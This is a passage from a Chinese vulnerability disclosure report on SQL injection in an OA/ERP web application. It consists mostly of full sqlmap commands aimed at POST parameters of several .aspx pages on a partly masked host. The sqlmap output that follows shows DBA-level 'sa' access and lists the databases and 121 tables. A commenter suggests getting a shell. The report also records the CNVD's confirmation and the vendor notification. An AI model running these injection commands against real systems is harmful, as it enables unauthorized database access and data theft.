NrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkuAqEbS7Zc03UpA1ESiQ3gUmJJEo%3D&TextBox1=ads&ImageButton4.x=20&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKk6arfBgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CcF0Fd6sfdJtgBZojxMdO5NePpgI" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/Sell/Contract.aspx"--dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAICZBYCZg9kFgYCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMmRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUWQ29udHJhY3RWaWV3LmFzcHg%2FSUQ9MmQWAmYPFQEY5buj5bee6LuK6KGMMSAyMDEzLjExLjE0ZAICDw8WAh8FBQcyMDEzMDAxZGQCAw8PFgIfBQUG6Yq35ZSuZGQCBA8PFgIfBQUH6LuK6KGMMWRkAgUPDxYCHwUFA2FhYWRkAgYPDxYCHwUFEzIwMTMtMTEtMTQgMTU6MjU6MTlkZAIHDw8WAh8FBQzpgJrov4flrqHmoLhkZAICDw9kFgQfAwVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfBAUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWEGYPZBYCAgEPDxYCHwUFATFkZAIBD2QWAgIBDw8WAh8GBRZDb250cmFjdFZpZXcuYXNweD9JRD0xZBYCZg8VAQbph4fotK1kAgIPDxYCHwUFBzIwMTIwMDFkZAIDDw8WAh8FBQbph4fotK1kZAIEDw8WAh8FBRLljJfkuqzkuK3llYbljLvoja9kZAIFDw8WAh8FBQNhYWFkZAIGDw8WAh8FBRMyMDEyLTEwLTI1IDE0OjUyOjEzZGQCBw8PFgIfBQUM6YCa6L%2BH5a6h5qC4ZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkuAqEbS7Zc03UpA1ESiQ3gUmJJEo%3D&TextBox1=ads&ImageButton4.x=20&ImageButton4.y=11&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKk6arfBgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CcF0Fd6sfdJtgBZojxMdO5NePpgI" -p TextBox1

TextBox1存在POST注入

注入十九、

sqlmap.py -u "**.**.**.**:38888/Car/CarLog.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTQ5OTIxMTYwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCwUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjYFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ9nZMsv76oU%2BcnIVl9sEL5HPn%2BdLzGG&DropDownList2=CarName&TextBox3=asd&ImageButton4.x=20&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEwKMj7HHAgLf5572CwLnqr7bDwKayI7FDwLgk7KqAwLs0Yq1BQLSwv2aBALSwqXRBQLSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CTFkpjF2elTwIxiQuU%2BQCx%2FJ9NMz" -p TextBox3 --dbms="mssql"<br>
TextBox3存在POST注入

sqlmap.py -u "**.**.**.**:38888/Car/CarLog.aspx" --data "__VIEWSTATE=%2FwEPDwUKLTQ5OTIxMTYwMQ9kFgJmD2QWBgIPDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIZDw8WAh4EVGV4dAUBMWRkAhsPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCwUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjYFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUIQnRuRmlyc3QFBkJ0blByZQUHQnRuTmV4dAUHQnRuTGFzdAUIQnV0dG9uR28FBkdWRGF0YQ9nZMsv76oU%2BcnIVl9sEL5HPn%2BdLzGG&DropDownList2=CarName&TextBox3=asd&ImageButton4.x=20&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEwKMj7HHAgLf5572CwLnqr7bDwKayI7FDwLgk7KqAwLs0Yq1BQLSwv2aBALSwqXRBQLSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CTFkpjF2elTwIxiQuU%2BQCx%2FJ9NMz" -p TextBox3 --dbms="mssql"

TextBox3存在POST注入

注入二十、

sqlmap.py -u "**.**.**.**:38888/DocFile/DangAn.aspx" --data "__VIEWSTATE=%2FwEPDwULLTExMDg2MDE4MzgPZBYCZg9kFggCAQ8PFgIeBFRleHRlZGQCDg88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGA8PFgIfAAUBMWRkAhoPDxYCHwAFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RZGyacswZw0WUqdtMoHBbw71m9hg%3D%3D&TextBox1=abc&ImageButton4.x=23&ImageButton4.y=10&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLNrKeTAQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbOjWL4mdYarCP4ShF8FGyvhczRv" -p TextBox1 --dbms="mssql"<br>TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/DocFile/DangAn.aspx" --data "__VIEWSTATE=%2FwEPDwULLTExMDg2MDE4MzgPZBYCZg9kFggCAQ8PFgIeBFRleHRlZGQCDg88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGA8PFgIfAAUBMWRkAhoPDxYCHwAFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RZGyacswZw0WUqdtMoHBbw71m9hg%3D%3D&TextBox1=abc&ImageButton4.x=23&ImageButton4.y=10&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLNrKeTAQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbOjWL4mdYarCP4ShF8FGyvhczRv" -p TextBox1 --dbms="mssql" TextBox1存在POST注入

好累=======================================================================数据证明

sqlmap.py -u "**.**.**.**:38888/DocFile/DangAn.aspx" --data "__VIEWSTATE=%2FwEPDwULLTExMDg2MDE4MzgPZBYCZg9kFggCAQ8PFgIeBFRleHRlZGQCDg88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCGA8PFgIfAAUBMWRkAhoPDxYCHwAFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RZGyacswZw0WUqdtMoHBbw71m9hg%3D%3D&TextBox1=abc&ImageButton4.x=23&ImageButton4.y=10&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLNrKeTAQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbOjWL4mdYarCP4ShF8FGyvhczRv" -p TextBox1 --dbms="mssql" --current-db --current-user --is-dba --dbs

数据库：

current user: 'sa'<br>
[17:38:23] [INFO] fetching current database<br>current database: 'FGOA'<br>
[17:38:23] [INFO] testing if current user is DBA<br>current user is DBA: True<br>
[17:38:24] [INFO] fetching database names<br>
available databases [11]:<br>
[*] FG360<br>
[*] FGOA<br>
[*] FGOA_T1<br>
[*] JWOA<br>
[*] JYOA<br>
[*] master<br>
[*] model<br>
[*] msdb<br>
[*] Northwind<br>
[*] pubs<br>
[*] tempdb

current user: 'sa'

[17:38:23] [INFO] fetching current database current database: 'FGOA'

[17:38:23] [INFO] testing if current user is DBA current user is DBA: True

[17:38:24] [INFO] fetching database names

available databases [11]:

[*] FG360

[*] FGOA

[*] FGOA_T1

[*] JWOA

[*] JYOA

[*] master

[*] model

[*] msdb

[*] Northwind

[*] pubs

[*] tempdb

数据表：

Database: FGOA<br>
[121 tables]<br>
+-------------------------+<br>
| dbo.ERPAnPai            |<br>
| dbo.ERPBBSBanKuai       |<br>
| dbo.ERPBBSTieZi         |<br>
| dbo.ERPBaoJia           |<br>
| dbo.ERPBaoXiao          |<br>
| dbo.ERPBook             |<br>
| dbo.ERPBookJieHuan      |<br>
| dbo.ERPBuMen            |<br>
| dbo.ERPBuyChanPin       |<br>
| dbo.ERPBuyOrder         |<br>
| dbo.ERPCYDIC            |<br>
| dbo.ERPCarBaoXian       |<br>
| dbo.ERPCarBaoYang       |<br>
| dbo.ERPCarInfo          |<br>
| dbo.ERPCarJiaYou        |<br>
| dbo.ERPCarLog           |<br>
| dbo.ERPCarShiYong       |<br>
| dbo.ERPCarWeiHu         |<br>
| dbo.ERPCarWeiZhang      |<br>
| dbo.ERPContract         |<br>
| dbo.ERPContractChanPin  |<br>
| dbo.ERPCrmSetting       |<br>
| dbo.ERPCustomFuWu       |<br>
| dbo.ERPCustomHuiFang    |<br>
| dbo.ERPCustomInfo       |<br>
| dbo.ERPCustomNeed       |<br>
| dbo.ERPDanWeiInfo       |<br>
| dbo.ERPDangAn           |<br>
| dbo.ERPFileList         |<br>
| dbo.ERPGongGao          |<br>
| dbo.ERPGuDing           |<br>
| dbo.ERPGuDingJiLu       |<br>
| dbo.ERPHuiBao           |<br>
| dbo.ERPHuiYuan          |<br>
| dbo.ERPJSDIC            |<br>
| dbo.ERPJXDetails        |<br>
| dbo.ERPJiXiao           |<br>
| dbo.ERPJiXiaoCanShu     |<br>
| dbo.ERPJianLi           |<br>
| dbo.ERPJiangCheng       |<br>
| dbo.ERPJiangChengZhiDu  |<br>
| dbo.ERPJiaoSe           |<br>
| dbo.ERPJinDu            |<br>
| dbo.ERPJuanKu           |<br>
| dbo.ERPKaoQin           |<br>
| dbo.ERPKaoQinSetting    |<br>
| dbo.ERPLanEmail         |<br>
| dbo.ERPLiRun            |<br>
| dbo.ERPLinkLog          |<br>
| dbo.ERPLinkMan          |<br>
| dbo.ERPMeeting          |<br>
| dbo.ERPMianShi          |<br>
| dbo.ERPMobile           |<br>
| dbo.ERPNForm            |<br>
| dbo.ERPNFormType        |<br>
| dbo.ERPNWorkDetails     |<br>
| dbo.ERPNWorkFlow        |<br>
| dbo.ERPNWorkFlowBQ      |<br>
| dbo.ERPNWorkFlowNode    |<br>
| dbo.ERPNWorkFlowWT      |<br>
| dbo.ERPNWorkToDo        |<br>
| dbo.ERPNetEmail         |<br>
| dbo.ERPOffice           |<br>
| dbo.ERPPeiXun           |<br>
| dbo.ERPPeiXunRiJi       |<br>
| dbo.ERPPeiXunXiaoGuo    |<br>
| dbo.ERPPinShen          |<br>
| dbo.ERPProduct          |<br>
| dbo.ERPProject          |<br>
| dbo.ERPRedHead          |<br>
| dbo.ERPRenShiHeTong     |<br>
| dbo.ERPReport           |<br>
| dbo.ERPReportType       |<br>
| dbo.ERPRiZhi            |<br>
| dbo.ERPSaveFileName     |<br>
| dbo.ERPSerils           |<br>
| dbo.ERPSheBei           |<br>
| dbo.ERPShenPi           |<br>
| dbo.ERPShiShi           |<br>
| dbo.ERPShouKuan         |<br>
| dbo.ERPSongYang         |<br>
| dbo.ERPSupplyLink       |<br>
| dbo.ERPSupplys          |<br>
| dbo.ERPSystemSetting    |<br>
| dbo.ERPTalkInfo         |<br>
| dbo.ERPTalkOnlineUser   |<br>
| dbo.ERPTalkSetting      |<br>
| dbo.ERPTaskFP           |<br>
| dbo.ERPTelFile          |<br>
| dbo.ERPTiKu             |<br>
| dbo.ERPTiKuKaoShi       |<br>
| dbo.ERPTiKuKaoShiJieGuo |<br>
| dbo.ERPTiKuShiJuan      |<br>
| dbo.ERPTiKuShiJuanSet   |<br>
| dbo.ERPTiKuShiJuanType  |<br>
| dbo.ERPTiKuType         |<br>
| dbo.ERPTongXunLu        |<br>
| dbo.ERPTouSu            |<br>
| dbo.ERPTreeList         |<br>
| dbo.ERPUser             |<br>
| dbo.ERPUserDesk         |<br>
| dbo.ERPVote             |<br>
| dbo.ERPWorkPlan         |<br>
| dbo.ERPWorkRiZhi        |<br>
| dbo.ERPXCDetails        |<br>
| dbo.ERPXinChou          |<br>
| dbo.ERPXinChouCanShu    |<br>
| dbo.ERPXueXi            |<br>
| dbo.ERPXueXiXinDe       |<br>
| dbo.ERPYinZhang         |<br>
| dbo.ERPYinZhangLog      |<br>
| dbo.FGOA_Fxzl           |<br>
| dbo.FGOA_FxzlHit        |<br>
| dbo.FGOA_FxzlType       |<br>
| dbo.FGOA_NetDisk        |<br>
| dbo.FGOA_PlugIn         |<br>
| dbo.View_1              |<br>
| dbo.dtproperties        |<br>
| dbo.fgoa_mobile_msg     |<br>
| dbo.sysconstraints      |<br>
| dbo.syssegments         |<br>
+-------------------------+

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

Database: FGOA

[121 tables]

+-------------------------+

| dbo.ERPAnPai |

| dbo.ERPBBSBanKuai |

| dbo.ERPBBSTieZi |

| dbo.ERPBaoJia |

| dbo.ERPBaoXiao |

| dbo.ERPBook |

| dbo.ERPBookJieHuan |

| dbo.ERPBuMen |

| dbo.ERPBuyChanPin |

| dbo.ERPBuyOrder |

| dbo.ERPCYDIC |

| dbo.ERPCarBaoXian |

| dbo.ERPCarBaoYang |

| dbo.ERPCarInfo |

| dbo.ERPCarJiaYou |

| dbo.ERPCarLog |

| dbo.ERPCarShiYong |

| dbo.ERPCarWeiHu |

| dbo.ERPCarWeiZhang |

| dbo.ERPContract |

| dbo.ERPContractChanPin |

| dbo.ERPCrmSetting |

| dbo.ERPCustomFuWu |

| dbo.ERPCustomHuiFang |

| dbo.ERPCustomInfo |

| dbo.ERPCustomNeed |

| dbo.ERPDanWeiInfo |

| dbo.ERPDangAn |

| dbo.ERPFileList |

| dbo.ERPGongGao |

| dbo.ERPGuDing |

| dbo.ERPGuDingJiLu |

| dbo.ERPHuiBao |

| dbo.ERPHuiYuan |

| dbo.ERPJSDIC |

| dbo.ERPJXDetails |

| dbo.ERPJiXiao |

| dbo.ERPJiXiaoCanShu |

| dbo.ERPJianLi |

| dbo.ERPJiangCheng |

| dbo.ERPJiangChengZhiDu |

| dbo.ERPJiaoSe |

| dbo.ERPJinDu |

| dbo.ERPJuanKu |

| dbo.ERPKaoQin |

| dbo.ERPKaoQinSetting |

| dbo.ERPLanEmail |

| dbo.ERPLiRun |

| dbo.ERPLinkLog |

| dbo.ERPLinkMan |

| dbo.ERPMeeting |

| dbo.ERPMianShi |

| dbo.ERPMobile |

| dbo.ERPNForm |

| dbo.ERPNFormType |

| dbo.ERPNWorkDetails |

| dbo.ERPNWorkFlow |

| dbo.ERPNWorkFlowBQ |

| dbo.ERPNWorkFlowNode |

| dbo.ERPNWorkFlowWT |

| dbo.ERPNWorkToDo |

| dbo.ERPNetEmail |

| dbo.ERPOffice |

| dbo.ERPPeiXun |

| dbo.ERPPeiXunRiJi |

| dbo.ERPPeiXunXiaoGuo |

| dbo.ERPPinShen |

| dbo.ERPProduct |

| dbo.ERPProject |

| dbo.ERPRedHead |

| dbo.ERPRenShiHeTong |

| dbo.ERPReport |

| dbo.ERPReportType |

| dbo.ERPRiZhi |

| dbo.ERPSaveFileName |

| dbo.ERPSerils |

| dbo.ERPSheBei |

| dbo.ERPShenPi |

| dbo.ERPShiShi |

| dbo.ERPShouKuan |

| dbo.ERPSongYang |

| dbo.ERPSupplyLink |

| dbo.ERPSupplys |

| dbo.ERPSystemSetting |

| dbo.ERPTalkInfo |

| dbo.ERPTalkOnlineUser |

| dbo.ERPTalkSetting |

| dbo.ERPTaskFP |

| dbo.ERPTelFile |

| dbo.ERPTiKu |

| dbo.ERPTiKuKaoShi |

| dbo.ERPTiKuKaoShiJieGuo |

| dbo.ERPTiKuShiJuan |

| dbo.ERPTiKuShiJuanSet |

| dbo.ERPTiKuShiJuanType |

| dbo.ERPTiKuType |

| dbo.ERPTongXunLu |

| dbo.ERPTouSu |

| dbo.ERPTreeList |

| dbo.ERPUser |

| dbo.ERPUserDesk |

| dbo.ERPVote |

| dbo.ERPWorkPlan |

| dbo.ERPWorkRiZhi |

| dbo.ERPXCDetails |

| dbo.ERPXinChou |

| dbo.ERPXinChouCanShu |

| dbo.ERPXueXi |

| dbo.ERPXueXiXinDe |

| dbo.ERPYinZhang |

| dbo.ERPYinZhangLog |

| dbo.FGOA_Fxzl |

| dbo.FGOA_FxzlHit |

| dbo.FGOA_FxzlType |

| dbo.FGOA_NetDisk |

| dbo.FGOA_PlugIn |

| dbo.View_1 |

| dbo.dtproperties |

| dbo.fgoa_mobile_msg |

| dbo.sysconstraints |

| dbo.syssegments |

+-------------------------+

漏洞证明：

上面已证明

修复方案：

过滤+升级程序然后补丁

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-06-2308:45

厂商回复：

cnvd确认并复现所述情况，已由cnvd通过公开联系渠道向软件生产厂商通报，由其后续协调网站管理单位处置。

评价

2010-01-01 00:00 change 白帽子 | Rank:30 漏洞数:2)

挖干净了////
2010-01-01 00:00 goubuli 白帽子 | Rank:206 漏洞数:15)

@change 拿个shell进去慢慢翻，估计还会有(￣▽￣)
2010-01-01 00:00 %230CC 白帽子 | Rank:0 漏洞数:0)

某OA 是啥偶诶
2010-01-01 00:00 心云白帽子 | Rank:64 漏洞数:7)

想问是怎么挖到这么多post注入的。。。。